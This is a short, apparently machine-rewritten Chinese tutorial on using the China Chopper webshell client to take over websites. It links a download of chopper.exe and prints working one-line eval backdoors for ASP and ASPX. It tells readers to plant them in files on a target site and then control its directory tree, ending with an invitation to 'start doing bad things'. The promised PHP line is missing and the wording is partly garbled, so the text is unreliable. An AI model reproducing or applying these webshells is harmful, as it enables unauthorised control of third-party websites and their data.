中国菜刀与跨站脚本攻击

中国菜刀下载链接: https://pan.baidu.com/s/1bLQqjlhKe8b0UzBan3Q3bA

QQ截图20190827131339.png

一.操作过程:

往总体目标网址中添加一句话木马,随后我也能够在当地根据中国菜刀chopper.exe就能获得和操纵全部站点目录结构

二.实战演练

asp的一段话是:

<%eval request (“pass”)%>

aspx的一段话是:

<%@ Page Language=”Jscript”%> <%eval(Request.Item[“pass”],”unsafe”);%>

php的一段话是:

人们能够立即将这种句子插进到网址上的某一asp/aspx/php文档上,或是立即建立1个新的文档,在里边载入这种句子,随后把上传文件到网址上就能。

下边举个小事例:

随后假定人们有一个纸张网址有那样的系统漏洞:

人们把这一lubr.php上发上去后,开启chopper.exe

联接到这一网站地址下人们的菜刀文档上,鼠标右键点一下文档管理,就能够获得全部网址的文件目录了~随后就能够刚开始做错事。